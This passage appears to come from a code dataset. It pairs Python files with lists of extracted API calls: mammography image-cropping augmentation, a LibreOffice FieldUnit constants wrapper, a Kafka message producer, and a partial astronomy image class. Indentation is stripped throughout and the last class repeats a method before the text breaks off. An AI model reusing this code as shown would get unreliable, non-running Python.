sample)\n', (4850, 4861), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((1550, 1577), 'os.listdir', 'os.listdir', (['path_model_base'], {}), '(path_model_base)\n', (1560, 1577), False, 'import os\n')] |
# Copyright (C) 2019 <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>
#
# This file is part of breast_cancer_classifier.
#
# breast_cancer_classifier is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# breast_cancer_classifier is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with breast_cancer_classifier. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
import cv2
import numpy as np
from src.constants import VIEWS
def shift_window_inside_image(start, end, image_axis_size, input_axis_size):
"""
If the window goes outside the bound of the image, then shifts it to fit inside the image.
"""
if start < 0:
start = 0
end = start + input_axis_size
elif end > image_axis_size:
end = image_axis_size
start = end - input_axis_size
return start, end
def zero_pad_and_align_window(image_axis_size, input_axis_size, max_crop_and_size_noise, bidirectional):
"""
Adds Zero padding to the image if cropped image is smaller than required window size.
"""
pad_width = input_axis_size - image_axis_size + max_crop_and_size_noise * (2 if bidirectional else 1)
assert (pad_width >= 0)
if bidirectional:
pad_front = int(pad_width / 2)
start = max_crop_and_size_noise
else:
start, pad_front = 0, 0
pad_back = pad_width - pad_front
end = start + input_axis_size
return start, end, pad_front, pad_back
def simple_resize(image_to_resize, size):
"""
Resizes image to the required size
"""
image_resized = cv2.resize(image_to_resize, (size[1], size[0]), interpolation=cv2.INTER_CUBIC)
if len(image_to_resize.shape) == 3 and len(image_resized.shape) == 2 and image_to_resize.shape[2] == 1:
image_resized = np.expand_dims(image_resized, 2)
return image_resized
def crop_image(image, input_size, borders):
"""
Crops image to the required size using window location
"""
cropped_image = image[borders[0]: borders[1], borders[2]: borders[3]]
if ((borders[1] - borders[0]) != input_size[0]) or ((borders[3] - borders[2]) != input_size[1]):
cropped_image = simple_resize(cropped_image, input_size)
return cropped_image
def window_location_at_center_point(input_size, center_y, center_x):
"""
Calculates window location (top, bottom, left, right)
given center point and size of augmentation window
"""
half_height = input_size[0] // 2
half_width = input_size[1] // 2
top = center_y - half_height
bottom = center_y + input_size[0] - half_height
left = center_x - half_width
right = center_x + input_size[1] - half_width
return top, bottom, left, right
def sample_crop_best_center(image, input_size, random_number_generator, max_crop_noise, max_crop_size_noise,
best_center, view):
"""
Crops using the best center point and ideal window size.
Pads small images to have enough room for crop noise and size noise.
Applies crop noise in location of the window borders.
"""
max_crop_noise = np.array(max_crop_noise)
crop_noise_multiplier = np.zeros(2, dtype=np.float32)
if max_crop_noise.any():
# there is no point in sampling crop_noise_multiplier if it's going to be multiplied by (0, 0)
crop_noise_multiplier = random_number_generator.uniform(low=-1.0, high=1.0, size=2)
center_y, center_x = best_center
# get the window around the center point. The window might be outside of the image.
top, bottom, left, right = window_location_at_center_point(input_size, center_y, center_x)
pad_y_top, pad_y_bottom, pad_x_right = 0, 0, 0
if VIEWS.is_cc(view):
if image.shape[0] < input_size[0] + (max_crop_noise[0] + max_crop_size_noise) * 2:
# Image is smaller than window size + noise margin in y direction.
# CC view: pad at both top and bottom
top, bottom, pad_y_top, pad_y_bottom = zero_pad_and_align_window(image.shape[0], input_size[0],
max_crop_noise[0] + max_crop_size_noise,
True)
elif VIEWS.is_mlo(view):
if image.shape[0] < input_size[0] + max_crop_noise[0] + max_crop_size_noise:
# Image is smaller than window size + noise margin in y direction.
# MLO view: only pad at the bottom
top, bottom, _, pad_y_bottom = zero_pad_and_align_window(image.shape[0], input_size[0],
max_crop_noise[0] + max_crop_size_noise, False)
else:
raise KeyError("Unknown view", view)
if image.shape[1] < input_size[1] + max_crop_noise[1] + max_crop_size_noise:
# Image is smaller than window size + noise margin in x direction.
left, right, _, pad_x_right = zero_pad_and_align_window(image.shape[1], input_size[1],
max_crop_noise[1] + max_crop_size_noise, False)
# Pad image if necessary by allocating new memory and copying contents over
if pad_y_top > 0 or pad_y_bottom > 0 or pad_x_right > 0:
new_zero_array = np.zeros((
image.shape[0] + pad_y_top + pad_y_bottom,
image.shape[1] + pad_x_right, image.shape[2]), dtype=image.dtype)
new_zero_array[pad_y_top: image.shape[0] + pad_y_top, 0: image.shape[1]] = image
image = new_zero_array
# if window is drawn outside of image, shift it to be inside the image.
top, bottom = shift_window_inside_image(top, bottom, image.shape[0], input_size[0])
left, right = shift_window_inside_image(left, right, image.shape[1], input_size[1])
if top == 0:
# there is nowhere to shift upwards, we only apply noise downwards
crop_noise_multiplier[0] = np.abs(crop_noise_multiplier[0])
elif bottom == image.shape[0]:
# there is nowhere to shift down, we only apply noise upwards
crop_noise_multiplier[0] = -np.abs(crop_noise_multiplier[0])
# else: we do nothing to the noise multiplier
if left == 0:
# there is nowhere to shift left, we only apply noise to move right
crop_noise_multiplier[1] = np.abs(crop_noise_multiplier[1])
elif right == image.shape[1]:
# there is nowhere to shift right, we only apply noise to move left
crop_noise_multiplier[1] = -np.abs(crop_noise_multiplier[1])
# else: we do nothing to the noise multiplier
borders = np.array((top, bottom, left, right), dtype=np.int32)
# Calculate maximum amount of how much the window can move for cropping noise
top_margin = top
bottom_margin = image.shape[0] - bottom
left_margin = left
right_margin = image.shape[1] - right
if crop_noise_multiplier[0] >= 0:
vertical_margin = bottom_margin
else:
vertical_margin = top_margin
if crop_noise_multiplier[1] >= 0:
horizontal_margin = right_margin
else:
horizontal_margin = left_margin
if vertical_margin < max_crop_noise[0]:
max_crop_noise[0] = vertical_margin
if horizontal_margin < max_crop_noise[1]:
max_crop_noise[1] = horizontal_margin
crop_noise = np.round(max_crop_noise * crop_noise_multiplier)
crop_noise = np.array((crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1]), dtype=np.int32)
borders = borders + crop_noise
# this is to make sure that the cropping window isn't outside of the image
assert (borders[0] >= 0) and (borders[1] <= image.shape[0]) and (borders[2] >= 0) and (borders[3] <= image.shape[
1]), "Centre of the crop area is sampled such that the borders are outside of the image. Borders: " + str(
borders) + ', image shape: ' + str(image.shape)
# return the padded image and cropping window information
return image, borders
def sample_crop(image, input_size, borders, random_number_generator, max_crop_size_noise):
"""
Applies size noise of the window borders.
"""
size_noise_multiplier = random_number_generator.uniform(low=-1.0, high=1.0, size=4)
top_margin = borders[0]
bottom_margin = image.shape[0] - borders[1]
left_margin = borders[2]
right_margin = image.shape[1] - borders[3]
max_crop_size_noise = min(max_crop_size_noise, top_margin, bottom_margin, left_margin, right_margin)
if input_size[0] >= input_size[1]:
max_crop_size_vertical_noise = max_crop_size_noise
max_crop_size_horizontal_noise = np.round(max_crop_size_noise * (input_size[1] / input_size[0]))
elif input_size[0] < input_size[1]:
max_crop_size_vertical_noise = np.round(max_crop_size_noise * (input_size[0] / input_size[1]))
max_crop_size_horizontal_noise = max_crop_size_noise
else:
raise RuntimeError()
max_crop_size_noise = np.array((max_crop_size_vertical_noise, max_crop_size_vertical_noise,
max_crop_size_horizontal_noise, max_crop_size_horizontal_noise),
dtype=np.int32)
size_noise = np.round(max_crop_size_noise * size_noise_multiplier)
size_noise = np.array(size_noise, dtype=np.int32)
borders = borders + size_noise
# this is to make sure that the cropping window isn't outside of the image
assert (borders[0] >= 0) and (borders[1] <= image.shape[0]) and (borders[2] >= 0) and (borders[3] <= image.shape[
1]), "Center of the crop area is sampled such that the borders are outside of the image. Borders: " + str(
borders) + ', image shape: ' + str(image.shape)
# Sanity check. make sure that the top is above the bottom
assert borders[1] > borders[0], "Bottom above the top. Top: " + str(borders[0]) + ', bottom: ' + str(borders[1])
# Sanity check. make sure that the left is left to the right
assert borders[3] > borders[2], "Left on the right. Left: " + str(borders[2]) + ', right: ' + str(borders[3])
return borders
def random_augmentation_best_center(image, input_size, random_number_generator, max_crop_noise=(0, 0),
max_crop_size_noise=0, auxiliary_image=None,
best_center=None, view=""):
"""
Crops augmentation window from a given image
by applying noise in location and size of the window.
"""
joint_image = np.expand_dims(image, 2)
if auxiliary_image is not None:
joint_image = np.concatenate([joint_image, auxiliary_image], axis=2)
joint_image, borders = sample_crop_best_center(joint_image, input_size, random_number_generator, max_crop_noise,
max_crop_size_noise, best_center, view)
borders = sample_crop(joint_image, input_size, borders, random_number_generator, max_crop_size_noise)
sampled_joint_image = crop_image(joint_image, input_size, borders)
if auxiliary_image is None:
return sampled_joint_image[:, :, 0], None
else:
return sampled_joint_image[:, :, 0], sampled_joint_image[:, :, 1:]
| [
"numpy.abs",
"src.constants.VIEWS.is_cc",
"numpy.array",
"numpy.zeros",
"src.constants.VIEWS.is_mlo",
"numpy.expand_dims",
"numpy.concatenate",
"cv2.resize",
"numpy.round"
] | [((2308, 2386), 'cv2.resize', 'cv2.resize', (['image_to_resize', '(size[1], size[0])'], {'interpolation': 'cv2.INTER_CUBIC'}), '(image_to_resize, (size[1], size[0]), interpolation=cv2.INTER_CUBIC)\n', (2318, 2386), False, 'import cv2\n'), ((3833, 3857), 'numpy.array', 'np.array', (['max_crop_noise'], {}), '(max_crop_noise)\n', (3841, 3857), True, 'import numpy as np\n'), ((3886, 3915), 'numpy.zeros', 'np.zeros', (['(2)'], {'dtype': 'np.float32'}), '(2, dtype=np.float32)\n', (3894, 3915), True, 'import numpy as np\n'), ((4423, 4440), 'src.constants.VIEWS.is_cc', 'VIEWS.is_cc', (['view'], {}), '(view)\n', (4434, 4440), False, 'from src.constants import VIEWS\n'), ((7323, 7375), 'numpy.array', 'np.array', (['(top, bottom, left, right)'], {'dtype': 'np.int32'}), '((top, bottom, left, right), dtype=np.int32)\n', (7331, 7375), True, 'import numpy as np\n'), ((8045, 8093), 'numpy.round', 'np.round', (['(max_crop_noise * crop_noise_multiplier)'], {}), '(max_crop_noise * crop_noise_multiplier)\n', (8053, 8093), True, 'import numpy as np\n'), ((8111, 8201), 'numpy.array', 'np.array', (['(crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1])'], {'dtype': 'np.int32'}), '((crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1]),\n dtype=np.int32)\n', (8119, 8201), True, 'import numpy as np\n'), ((9667, 9826), 'numpy.array', 'np.array', (['(max_crop_size_vertical_noise, max_crop_size_vertical_noise,\n max_crop_size_horizontal_noise, max_crop_size_horizontal_noise)'], {'dtype': 'np.int32'}), '((max_crop_size_vertical_noise, max_crop_size_vertical_noise,\n max_crop_size_horizontal_noise, max_crop_size_horizontal_noise), dtype=\n np.int32)\n', (9675, 9826), True, 'import numpy as np\n'), ((9906, 9959), 'numpy.round', 'np.round', (['(max_crop_size_noise * size_noise_multiplier)'], {}), '(max_crop_size_noise * size_noise_multiplier)\n', (9914, 9959), True, 'import numpy as np\n'), ((9977, 10013), 'numpy.array', 'np.array', (['size_noise'], {'dtype': 'np.int32'}), '(size_noise, dtype=np.int32)\n', (9985, 10013), True, 'import numpy as np\n'), ((11191, 11215), 'numpy.expand_dims', 'np.expand_dims', (['image', '(2)'], {}), '(image, 2)\n', (11205, 11215), True, 'import numpy as np\n'), ((2519, 2551), 'numpy.expand_dims', 'np.expand_dims', (['image_resized', '(2)'], {}), '(image_resized, 2)\n', (2533, 2551), True, 'import numpy as np\n'), ((4980, 4998), 'src.constants.VIEWS.is_mlo', 'VIEWS.is_mlo', (['view'], {}), '(view)\n', (4992, 4998), False, 'from src.constants import VIEWS\n'), ((6014, 6136), 'numpy.zeros', 'np.zeros', (['(image.shape[0] + pad_y_top + pad_y_bottom, image.shape[1] + pad_x_right,\n image.shape[2])'], {'dtype': 'image.dtype'}), '((image.shape[0] + pad_y_top + pad_y_bottom, image.shape[1] +\n pad_x_right, image.shape[2]), dtype=image.dtype)\n', (6022, 6136), True, 'import numpy as np\n'), ((6659, 6691), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[0]'], {}), '(crop_noise_multiplier[0])\n', (6665, 6691), True, 'import numpy as np\n'), ((7046, 7078), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[1]'], {}), '(crop_noise_multiplier[1])\n', (7052, 7078), True, 'import numpy as np\n'), ((9333, 9396), 'numpy.round', 'np.round', (['(max_crop_size_noise * (input_size[1] / input_size[0]))'], {}), '(max_crop_size_noise * (input_size[1] / input_size[0]))\n', (9341, 9396), True, 'import numpy as np\n'), ((11274, 11328), 'numpy.concatenate', 'np.concatenate', (['[joint_image, auxiliary_image]'], {'axis': '(2)'}), '([joint_image, auxiliary_image], axis=2)\n', (11288, 11328), True, 'import numpy as np\n'), ((9476, 9539), 'numpy.round', 'np.round', (['(max_crop_size_noise * (input_size[0] / input_size[1]))'], {}), '(max_crop_size_noise * (input_size[0] / input_size[1]))\n', (9484, 9539), True, 'import numpy as np\n'), ((6833, 6865), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[0]'], {}), '(crop_noise_multiplier[0])\n', (6839, 6865), True, 'import numpy as np\n'), ((7225, 7257), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[1]'], {}), '(crop_noise_multiplier[1])\n', (7231, 7257), True, 'import numpy as np\n')] |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Const Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.awt
from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
_DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
from com.sun.star.awt import FieldUnit as FieldUnit
if hasattr(FieldUnit, '_constants') and isinstance(FieldUnit._constants, dict):
FieldUnit._constants['__ooo_ns__'] = 'com.sun.star.awt'
FieldUnit._constants['__ooo_full_ns__'] = 'com.sun.star.awt.FieldUnit'
FieldUnit._constants['__ooo_type_name__'] = 'const'
def build_enum():
global FieldUnitEnum
ls = [f for f in dir(FieldUnit) if not callable(getattr(FieldUnit, f)) and not f.startswith('__')]
_dict = {}
for name in ls:
_dict[name] = getattr(FieldUnit, name)
FieldUnitEnum = IntEnum('FieldUnitEnum', _dict)
build_enum()
else:
from ...lo.awt.field_unit import FieldUnit as FieldUnit
class FieldUnitEnum(IntEnum):
"""
Enum of Const Class FieldUnit
specifies attributes for the MetricField map units.
IMPORTANT: These constants have to be disjunct with constants in util/MeasureUnit.
"""
FUNIT_NONE = FieldUnit.FUNIT_NONE
FUNIT_MM = FieldUnit.FUNIT_MM
FUNIT_CM = FieldUnit.FUNIT_CM
FUNIT_M = FieldUnit.FUNIT_M
FUNIT_KM = FieldUnit.FUNIT_KM
FUNIT_TWIP = FieldUnit.FUNIT_TWIP
FUNIT_POINT = FieldUnit.FUNIT_POINT
FUNIT_PICA = FieldUnit.FUNIT_PICA
FUNIT_INCH = FieldUnit.FUNIT_INCH
FUNIT_FOOT = FieldUnit.FUNIT_FOOT
FUNIT_MILE = FieldUnit.FUNIT_MILE
FUNIT_CUSTOM = FieldUnit.FUNIT_CUSTOM
FUNIT_PERCENT = FieldUnit.FUNIT_PERCENT
FUNIT_100TH_MM = FieldUnit.FUNIT_100TH_MM
__all__ = ['FieldUnit', 'FieldUnitEnum']
| [
"enum.IntEnum"
] | [((1604, 1635), 'enum.IntEnum', 'IntEnum', (['"""FieldUnitEnum"""', '_dict'], {}), "('FieldUnitEnum', _dict)\n", (1611, 1635), False, 'from enum import IntEnum\n')] |
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import time
from collections import defaultdict
from collections import namedtuple
from contextlib import contextmanager
from cached_property import cached_property
from kafka import create_message
from kafka import KafkaClient
from kafka.common import ProduceRequest
from data_pipeline._position_data_tracker import PositionDataTracker
from data_pipeline._producer_retry import RetryHandler
from data_pipeline._retry_util import ExpBackoffPolicy
from data_pipeline._retry_util import MaxRetryError
from data_pipeline._retry_util import Predicate
from data_pipeline._retry_util import retry_on_condition
from data_pipeline._retry_util import RetryPolicy
from data_pipeline.config import get_config
from data_pipeline.envelope import Envelope
_EnvelopeAndMessage = namedtuple("_EnvelopeAndMessage", ["envelope", "message"])
logger = get_config().logger
# prepare needs to be in the module top level so it can be serialized for
# multiprocessing
def _prepare(envelope_and_message):
try:
kwargs = {}
if envelope_and_message.message.keys:
kwargs['key'] = envelope_and_message.message.encoded_keys
return create_message(
envelope_and_message.envelope.pack(envelope_and_message.message),
**kwargs
)
except:
logger.exception('Prepare failed')
raise
class KafkaProducer(object):
"""The KafkaProducer deals with buffering messages that need to be published
into Kafka, preparing them for publication, and ultimately publishing them.
Args:
producer_position_callback (function): The producer position callback
is called when the KafkaProducer is instantiated, and every time
messages are published to notify the producer of current position
information of successfully published messages.
dry_run (Optional[bool]): When dry_run mode is on, the producer won't
talk to real KafKa topic, nor to real Schematizer. Default to False.
"""
@cached_property
def envelope(self):
return Envelope()
def __init__(self, producer_position_callback, dry_run=False):
self.producer_position_callback = producer_position_callback
self.dry_run = dry_run
self.kafka_client = KafkaClient(get_config().cluster_config.broker_list)
self.position_data_tracker = PositionDataTracker()
self._reset_message_buffer()
self.skip_messages_with_pii = get_config().skip_messages_with_pii
self._publish_retry_policy = RetryPolicy(
ExpBackoffPolicy(with_jitter=True),
max_retry_count=get_config().producer_max_publish_retry_count
)
self._automatic_flush_enabled = True
@contextmanager
def disable_automatic_flushing(self):
"""Prevents the producer from flushing automatically (e.g. for timeouts
or batch size) while the context manager is open.
"""
try:
self._automatic_flush_enabled = False
yield
finally:
self._automatic_flush_enabled = True
def wake(self):
"""Should be called periodically if we're not otherwise waking up by
publishing, to ensure that messages are actually published.
"""
# if we haven't woken up in a while, we may need to flush messages
self._flush_if_necessary()
def publish(self, message):
if message.contains_pii and self.skip_messages_with_pii:
logger.info(
"Skipping a PII message - "
"uuid hex: {0}, "
"schema_id: {1}, "
"timestamp: {2}, "
"type: {3}".format(
message.uuid_hex,
message.schema_id,
message.timestamp,
message.message_type.name
)
)
return
self._add_message_to_buffer(message)
self.position_data_tracker.record_message_buffered(message)
self._flush_if_necessary()
def flush_buffered_messages(self):
produce_method = (self._publish_produce_requests_dry_run
if self.dry_run else self._publish_produce_requests)
produce_method(self._generate_produce_requests())
self._reset_message_buffer()
def close(self):
self.flush_buffered_messages()
self.kafka_client.close()
def _publish_produce_requests(self, requests):
"""It will try to publish all the produce requests for topics, and
retry a number of times until either all the requests are successfully
published or it can no longer retry, in which case, the exception will
be thrown.
Each time the requests that are successfully published in the previous
round will be removed from the requests and won't be published again.
"""
unpublished_requests = list(requests)
retry_handler = RetryHandler(self.kafka_client, unpublished_requests)
def has_requests_to_be_sent():
return bool(retry_handler.requests_to_be_sent)
retry_handler = retry_on_condition(
retry_policy=self._publish_retry_policy,
retry_conditions=[Predicate(has_requests_to_be_sent)],
func_to_retry=self._publish_requests,
use_previous_result_as_param=True,
retry_handler=retry_handler
)
if retry_handler.has_unpublished_request:
raise MaxRetryError(last_result=retry_handler)
def _publish_requests(self, retry_handler):
"""Main function to publish message requests. This function is wrapped
with retry function and will be retried based on specified retry policy
Args:
retry_handler: :class:`data_pipeline._producer_retry.RetryHandler`
that determines which messages should be retried next time.
"""
if not retry_handler.requests_to_be_sent:
return retry_handler
responses = self._try_send_produce_requests(
retry_handler.requests_to_be_sent
)
retry_handler.update_requests_to_be_sent(
responses,
self.position_data_tracker.topic_to_kafka_offset_map
)
self._record_success_requests(retry_handler.success_topic_stats_map)
return retry_handler
def _try_send_produce_requests(self, requests):
# Either it throws exceptions and none of them succeeds, or it returns
# responses of all the requests (success or fail response).
try:
return self.kafka_client.send_produce_request(
payloads=requests,
acks=get_config().kafka_client_ack_count,
fail_on_error=False
)
except Exception:
# Exceptions like KafkaUnavailableError, LeaderNotAvailableError,
# UnknownTopicOrPartitionError, etc., are not controlled by
# `fail_on_error` flag and could be thrown from the kafka client,
# and fail all the requests. We will retry all the requests until
# either all of them are successfully published or it exceeds the
# maximum retry criteria.
return []
def _record_success_requests(self, success_topic_stats_map):
for topic_partition, stats in success_topic_stats_map.iteritems():
topic = topic_partition.topic_name
assert stats.message_count == len(self.message_buffer[topic])
self.position_data_tracker.record_messages_published(
topic=topic,
offset=stats.original_offset,
message_count=stats.message_count
)
self.message_buffer.pop(topic)
def _publish_produce_requests_dry_run(self, requests):
for request in requests:
self._publish_single_request_dry_run(request)
def _publish_single_request_dry_run(self, request):
topic = request.topic
message_count = len(request.messages)
self.position_data_tracker.record_messages_published(
topic,
-1,
message_count
)
def _is_ready_to_flush(self):
time_limit = get_config().kafka_producer_flush_time_limit_seconds
return (self._automatic_flush_enabled and (
(time.time() - self.start_time) >= time_limit or
self.message_buffer_size >= get_config().kafka_producer_buffer_size
))
def _flush_if_necessary(self):
if self._is_ready_to_flush():
self.flush_buffered_messages()
def _add_message_to_buffer(self, message):
topic = message.topic
message = self._prepare_message(message)
self.message_buffer[topic].append(message)
self.message_buffer_size += 1
def _generate_produce_requests(self):
return [
ProduceRequest(topic=topic, partition=0, messages=messages)
for topic, messages in self._generate_prepared_topic_and_messages()
]
def _generate_prepared_topic_and_messages(self):
return self.message_buffer.iteritems()
def _prepare_message(self, message):
return _prepare(_EnvelopeAndMessage(envelope=self.envelope, message=message))
def _reset_message_buffer(self):
if not hasattr(self, 'message_buffer_size') or self.message_buffer_size > 0:
self.producer_position_callback(self.position_data_tracker.get_position_data())
self.start_time = time.time()
self.message_buffer = defaultdict(list)
self.message_buffer_size = 0
class LoggingKafkaProducer(KafkaProducer):
def _publish_produce_requests(self, requests):
logger.info(
"Flushing buffered messages - requests={0}, messages={1}".format(
len(requests), self.message_buffer_size
)
)
try:
super(LoggingKafkaProducer, self)._publish_produce_requests(requests)
logger.info("All messages published successfully")
except MaxRetryError as e:
logger.exception(
"Failed to publish all produce requests. {0}".format(repr(e))
)
raise
def _reset_message_buffer(self):
logger.info("Resetting message buffer for success requests.")
super(LoggingKafkaProducer, self)._reset_message_buffer()
def _publish_single_request_dry_run(self, request):
super(LoggingKafkaProducer, self)._publish_single_request_dry_run(request)
logger.debug("dry_run mode: Would have published {0} messages to {1}".format(
len(request.messages),
request.topic
))
| [
"data_pipeline._retry_util.MaxRetryError",
"collections.namedtuple",
"kafka.common.ProduceRequest",
"data_pipeline._retry_util.Predicate",
"data_pipeline.config.get_config",
"collections.defaultdict",
"data_pipeline._position_data_tracker.PositionDataTracker",
"data_pipeline._retry_util.ExpBackoffPoli... | [((1446, 1504), 'collections.namedtuple', 'namedtuple', (['"""_EnvelopeAndMessage"""', "['envelope', 'message']"], {}), "('_EnvelopeAndMessage', ['envelope', 'message'])\n", (1456, 1504), False, 'from collections import namedtuple\n'), ((1514, 1526), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (1524, 1526), False, 'from data_pipeline.config import get_config\n'), ((2742, 2752), 'data_pipeline.envelope.Envelope', 'Envelope', ([], {}), '()\n', (2750, 2752), False, 'from data_pipeline.envelope import Envelope\n'), ((3039, 3060), 'data_pipeline._position_data_tracker.PositionDataTracker', 'PositionDataTracker', ([], {}), '()\n', (3058, 3060), False, 'from data_pipeline._position_data_tracker import PositionDataTracker\n'), ((5633, 5686), 'data_pipeline._producer_retry.RetryHandler', 'RetryHandler', (['self.kafka_client', 'unpublished_requests'], {}), '(self.kafka_client, unpublished_requests)\n', (5645, 5686), False, 'from data_pipeline._producer_retry import RetryHandler\n'), ((10198, 10209), 'time.time', 'time.time', ([], {}), '()\n', (10207, 10209), False, 'import time\n'), ((10240, 10257), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (10251, 10257), False, 'from collections import defaultdict\n'), ((3136, 3148), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (3146, 3148), False, 'from data_pipeline.config import get_config\n'), ((3234, 3268), 'data_pipeline._retry_util.ExpBackoffPolicy', 'ExpBackoffPolicy', ([], {'with_jitter': '(True)'}), '(with_jitter=True)\n', (3250, 3268), False, 'from data_pipeline._retry_util import ExpBackoffPolicy\n'), ((6166, 6206), 'data_pipeline._retry_util.MaxRetryError', 'MaxRetryError', ([], {'last_result': 'retry_handler'}), '(last_result=retry_handler)\n', (6179, 6206), False, 'from data_pipeline._retry_util import MaxRetryError\n'), ((8915, 8927), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (8925, 8927), False, 'from data_pipeline.config import get_config\n'), ((9578, 9637), 'kafka.common.ProduceRequest', 'ProduceRequest', ([], {'topic': 'topic', 'partition': '(0)', 'messages': 'messages'}), '(topic=topic, partition=0, messages=messages)\n', (9592, 9637), False, 'from kafka.common import ProduceRequest\n'), ((2961, 2973), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (2971, 2973), False, 'from data_pipeline.config import get_config\n'), ((3298, 3310), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (3308, 3310), False, 'from data_pipeline.config import get_config\n'), ((5914, 5948), 'data_pipeline._retry_util.Predicate', 'Predicate', (['has_requests_to_be_sent'], {}), '(has_requests_to_be_sent)\n', (5923, 5948), False, 'from data_pipeline._retry_util import Predicate\n'), ((7374, 7386), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (7384, 7386), False, 'from data_pipeline.config import get_config\n'), ((9033, 9044), 'time.time', 'time.time', ([], {}), '()\n', (9042, 9044), False, 'import time\n'), ((9121, 9133), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (9131, 9133), False, 'from data_pipeline.config import get_config\n')] |
import numpy as np
import matplotlib.pyplot as plt
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.nddata import CCDData
from astropy.nddata import Cutout2D
from astropy.stats import sigma_clipped_stats
from astropy.wcs.utils import proj_plane_pixel_scales
from .plot import plot_image
from .instrument_info import get_zp
from .utils import get_wcs_rotation
from astropy.visualization import simple_norm, make_lupton_rgb
from .math import Maskellipse,polynomialfit,cross_match
from photutils.segmentation import deblend_sources
from astropy.convolution import Gaussian2DKernel
from astropy.stats import gaussian_fwhm_to_sigma
from photutils import detect_threshold
from photutils import detect_sources
from photutils import source_properties
from astropy.table import Table, Column, join, join_skycoord
from astropy.wcs import WCS
from astropy.nddata import NDData
from photutils.psf import extract_stars
import matplotlib.colors as colors
from photutils import EPSFBuilder
__all__ = ['image', 'image_atlas']
class image(object):
'''
A single image object.
Functions
---------
* Read from fits file use CCDData.
* get_size : Get the image size.
* plot : Plot the image.
* sigma_clipped_stats : Calculate the basic statistics of the image.
* set_data : Load from numpy array.
* set_mask : Set image mask.
* set_pixel_scales : Set the pixel scales along two axes.
* set_zero_point : Set magnitude zero point.
'''
def __init__(self, filename=None, hdu=0, unit=None, zero_point=None,
pixel_scales=None, wcs_rotation=None, mask=None, verbose=True):
'''
Parameters
----------
filename (optional) : string
FITS file name of the image.
hdu : int (default: 0)
The number of extension to load from the FITS file.
unit (optional) : string
Unit of the image flux for CCDData.
zero_point (optional) : float
Magnitude zero point.
pixel_scales (optional) : tuple
Pixel scales along the first and second directions, units: arcsec.
wcs_rotation (optional) : float
WCS rotation, east of north, units: radian.
mask (optional) : 2D bool array
The image mask.
verbose : bool (default: True)
Print out auxiliary data.
'''
if filename is None:
self.data = None
else:
self.data = CCDData.read(filename, hdu=hdu, unit=unit, mask=mask)
if self.data.wcs and (pixel_scales is None):
pixel_scales = proj_plane_pixel_scales(self.data.wcs) * u.degree.to('arcsec')
self.zero_point = zero_point
if pixel_scales is None:
self.pixel_scales = None
else:
self.pixel_scales = (pixel_scales[0]*u.arcsec, pixel_scales[1]*u.arcsec)
if self.data.wcs and (wcs_rotation is None):
self.wcs_rotation = get_wcs_rotation(self.data.wcs)
elif wcs_rotation is not None:
self.wcs_rotation = wcs_rotation * u.radian
else:
self.wcs_rotation = None
self.sources_catalog = None
self.sigma_image = None
self.sources_skycord = None
self.ss_data = None
self.PSF = None
def get_size(self, units='pixel'):
'''
Get the size of the image.
Parameters
----------
units : string
Units of the size (pixel or angular units).
Returns
-------
x, y : float
Size along X and Y axes.
'''
nrow, ncol = self.data.shape
if units == 'pixel':
x = ncol
y = nrow
else:
x = ncol * self.pixel_scales[0].to(units).value
y = nrow * self.pixel_scales[1].to(units).value
return (x, y)
def get_size(self, units='pixel'):
'''
Get the size of the image.
Parameters
----------
units : string
Units of the size (pixel or angular units).
Returns
-------
x, y : float
Size along X and Y axes.
'''
